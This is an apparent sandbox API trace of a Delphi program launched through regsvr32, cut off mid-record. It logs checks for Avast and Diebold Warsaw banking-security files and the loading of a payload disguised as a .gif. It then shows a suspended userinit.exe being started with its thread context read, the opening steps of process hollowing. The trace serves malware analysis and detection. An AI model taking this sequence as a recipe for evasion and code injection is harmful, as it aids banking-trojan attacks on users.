[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff21, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff20, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff3f, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff3e, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff3d, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff3c, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff3b, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff3a, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff39, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff38, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0086.089] LoadStringA (in: hInstance=0x530000, uID=0xff37, lpBuffer=0x12e314, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0086.089] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0086.089] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0086.089] GetVersion () returned 0x1db10106
[0086.089] GetCurrentProcessId () returned 0xf18
[0086.089] GlobalAddAtomA (lpString="Delphi00000F18") returned 0xc160
[0086.089] GetCurrentThreadId () returned 0xf1c
[0086.089] GlobalAddAtomA (lpString="ControlOfs0053000000000F1C") returned 0xc15f
[0086.089] RegisterClipboardFormatA (lpszFormat="ControlOfs0053000000000F1C") returned 0xc159
[0086.090] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0086.090] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0086.090] GetSystemMetrics (nIndex=19) returned 1
[0086.090] GetSystemMetrics (nIndex=75) returned 1
[0086.090] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x1791310, fWinIni=0x0 | out: pvParam=0x1791310) returned 1
[0086.090] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0086.090] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0086.090] LoadCursorA (hInstance=0x530000, lpCursorName=0x7ff9) returned 0x60179
[0086.091] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0086.091] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0086.091] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0086.091] LoadCursorA (hInstance=0x530000, lpCursorName=0x7ffa) returned 0x50189
[0086.091] LoadCursorA (hInstance=0x530000, lpCursorName=0x7ffb) returned 0x50191
[0086.091] LoadCursorA (hInstance=0x530000, lpCursorName=0x7ffc) returned 0x700ff
[0086.091] LoadCursorA (hInstance=0x530000, lpCursorName=0x7ffd) returned 0x2b008b
[0086.092] LoadCursorA (hInstance=0x530000, lpCursorName=0x7fff) returned 0x30193
[0086.092] LoadCursorA (hInstance=0x530000, lpCursorName=0x7ffe) returned 0x20197
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0086.092] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0086.092] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0086.093] GetDC (hWnd=0x0) returned 0x2b010799
[0086.093] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0086.093] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0086.093] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0086.093] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x574e68, dwData=0x179155c) returned 1
[0086.093] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x12e67f, fWinIni=0x0 | out: pvParam=0x12e67f) returned 1
[0086.093] CreateFontIndirectA (lplf=0x12e67f) returned 0x240a0708
[0086.093] GetObjectA (in: h=0x240a0708, c=60, pv=0x12e470 | out: pv=0x12e470) returned 60
[0086.093] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x12e52b, fWinIni=0x0 | out: pvParam=0x12e52b) returned 1
[0086.093] CreateFontIndirectA (lplf=0x12e607) returned 0x500a06fa
[0086.093] GetObjectA (in: h=0x500a06fa, c=60, pv=0x12e470 | out: pv=0x12e470) returned 60
[0086.094] CreateFontIndirectA (lplf=0x12e5cb) returned 0x200a06f9
[0086.094] GetObjectA (in: h=0x200a06f9, c=60, pv=0x12e470 | out: pv=0x12e470) returned 60
[0086.094] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0086.094] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12e5df, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\regsvr32.exe" (normalized: "c:\\windows\\system32\\regsvr32.exe")) returned 0x20
[0086.138] OemToCharA (in: pSrc="C:\\Windows\\System32\\regsvr32.exe", pDst=0x12e5df | out: pDst="C:\\Windows\\System32\\regsvr32.exe") returned 1
[0086.138] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x430000
[0086.138] GetKeyboardLayoutList (in: nBuff=64, lpList=0x12e560 | out: lpList=0x12e560) returned 1
[0086.139] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0086.140] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0086.140] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x73e90000
[0086.140] GetProcAddress (hModule=0x73e90000, lpProcName="InitializeFlatSB") returned 0x73f6f803
[0086.140] GetProcAddress (hModule=0x73e90000, lpProcName="UninitializeFlatSB") returned 0x73e9d1ea
[0086.140] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_GetScrollProp") returned 0x73f6f81f
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_SetScrollProp") returned 0x73f107d0
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_EnableScrollBar") returned 0x73f6f84b
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_ShowScrollBar") returned 0x73f6f83a
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_GetScrollRange") returned 0x73f6f829
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_GetScrollInfo") returned 0x73f108b6
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_GetScrollPos") returned 0x73f6f80e
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_SetScrollPos") returned 0x73f10894
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_SetScrollInfo") returned 0x73f108c7
[0086.141] GetProcAddress (hModule=0x73e90000, lpProcName="FlatSB_SetScrollRange") returned 0x73f108a5
[0086.141] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0086.142] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0086.142] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0086.142] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0086.142] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0086.142] GetCurrentThreadId () returned 0xf1c
[0086.142] GlobalAddAtomA (lpString="WndProcPtr0053000000000F1C") returned 0xc15e
[0086.142] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0086.142] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0086.143] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0086.143] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0086.143] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4
[0086.143] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0086.143] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0086.143] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0086.143] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0086.145] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0086.145] ReadFile (in: hFile=0xe4, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0086.199] CloseHandle (hObject=0xe4) returned 1
[0086.199] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.200] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.200] GlobalUnlock (hMem=0x95000c) returned 0
[0086.200] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0086.201] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.201] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.201] GlobalUnlock (hMem=0x95000c) returned 0
[0086.202] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0086.202] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0086.203] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0086.203] GlobalUnlock (hMem=0x95000c) returned 0
[0086.203] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0086.204] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0086.205] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0086.205] GlobalUnlock (hMem=0x95000c) returned 0
[0086.205] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0086.205] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0086.206] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0086.206] GlobalUnlock (hMem=0x95000c) returned 0
[0086.206] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0086.207] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0086.207] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0086.207] GlobalUnlock (hMem=0x95000c) returned 0
[0086.207] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0086.208] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.208] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.208] GlobalUnlock (hMem=0x95000c) returned 0
[0086.208] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0086.209] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.209] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.209] GlobalUnlock (hMem=0x95000c) returned 0
[0086.209] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0086.209] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.210] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.210] GlobalUnlock (hMem=0x95000c) returned 0
[0086.210] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0086.210] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.211] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.211] GlobalUnlock (hMem=0x95000c) returned 0
[0086.211] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0086.211] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.212] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.212] GlobalUnlock (hMem=0x95000c) returned 0
[0086.212] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0086.212] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.213] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.213] GlobalUnlock (hMem=0x95000c) returned 0
[0086.213] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0086.213] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.214] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.214] GlobalUnlock (hMem=0x95000c) returned 0
[0086.214] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0086.214] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.215] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.215] GlobalUnlock (hMem=0x95000c) returned 0
[0086.215] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0086.215] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.216] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.216] GlobalUnlock (hMem=0x95000c) returned 0
[0086.216] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0086.216] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.217] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.217] GlobalUnlock (hMem=0x95000c) returned 0
[0086.217] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0086.219] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0086.220] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0086.220] GlobalUnlock (hMem=0x95000c) returned 0
[0086.220] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0086.220] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0086.221] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0086.221] GlobalUnlock (hMem=0x95000c) returned 0
[0086.221] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0086.224] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0086.225] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0086.225] GlobalUnlock (hMem=0x95000c) returned 0
[0086.225] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0086.225] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.226] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.226] GlobalUnlock (hMem=0x95000c) returned 0
[0086.226] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0086.226] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.226] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.226] GlobalUnlock (hMem=0x95000c) returned 0
[0086.227] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0086.227] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.227] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.227] GlobalUnlock (hMem=0x95000c) returned 0
[0086.227] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0086.227] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.228] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.228] GlobalUnlock (hMem=0x95000c) returned 0
[0086.229] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0086.229] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.230] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.230] GlobalUnlock (hMem=0x95000c) returned 0
[0086.230] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0086.230] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.273] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.273] GlobalUnlock (hMem=0x95000c) returned 0
[0086.273] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0086.273] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.274] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.274] GlobalUnlock (hMem=0x95000c) returned 0
[0086.274] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0086.274] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.275] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.275] GlobalUnlock (hMem=0x95000c) returned 0
[0086.275] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0086.275] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.276] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.276] GlobalUnlock (hMem=0x95000c) returned 0
[0086.276] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0086.276] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.277] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.277] GlobalUnlock (hMem=0x95000c) returned 0
[0086.277] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0086.277] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.278] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.278] GlobalUnlock (hMem=0x95000c) returned 0
[0086.278] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0086.278] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.279] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.279] GlobalUnlock (hMem=0x95000c) returned 0
[0086.279] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0086.279] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.280] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.280] GlobalUnlock (hMem=0x95000c) returned 0
[0086.280] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0086.280] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.281] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.281] GlobalUnlock (hMem=0x95000c) returned 0
[0086.281] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0086.281] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.281] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.281] GlobalUnlock (hMem=0x95000c) returned 0
[0086.281] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0086.282] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.282] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.282] GlobalUnlock (hMem=0x95000c) returned 0
[0086.282] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0086.282] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.283] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.283] GlobalUnlock (hMem=0x95000c) returned 0
[0086.283] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0086.283] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.284] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.284] GlobalUnlock (hMem=0x95000c) returned 0
[0086.284] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0086.284] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.285] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.285] GlobalUnlock (hMem=0x95000c) returned 0
[0086.285] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0086.285] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.286] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.286] GlobalUnlock (hMem=0x95000c) returned 0
[0086.286] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0086.286] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.287] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.287] GlobalUnlock (hMem=0x95000c) returned 0
[0086.287] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0086.287] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.288] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.288] GlobalUnlock (hMem=0x95000c) returned 0
[0086.288] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0086.288] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.289] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.289] GlobalUnlock (hMem=0x95000c) returned 0
[0086.289] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0086.289] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.290] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.290] GlobalUnlock (hMem=0x95000c) returned 0
[0086.290] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0086.290] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.291] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.291] GlobalUnlock (hMem=0x95000c) returned 0
[0086.291] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0086.291] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.292] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.292] GlobalUnlock (hMem=0x95000c) returned 0
[0086.292] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0086.292] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.293] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0086.293] GlobalUnlock (hMem=0x95000c) returned 0
[0086.293] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0086.293] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0086.294] VirtualAlloc (lpAddress=0x1794000, dwSize=0x60000, flAllocationType=0x1000, flProtect=0x4) returned 0x1794000
[0086.302] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0xe8, hThread=0xe4, dwProcessId=0xf50, dwThreadId=0xf54)) returned 1
[0086.387] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0086.387] GetThreadContext (in: hThread=0xe4, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0xef2be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x14fe98, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, 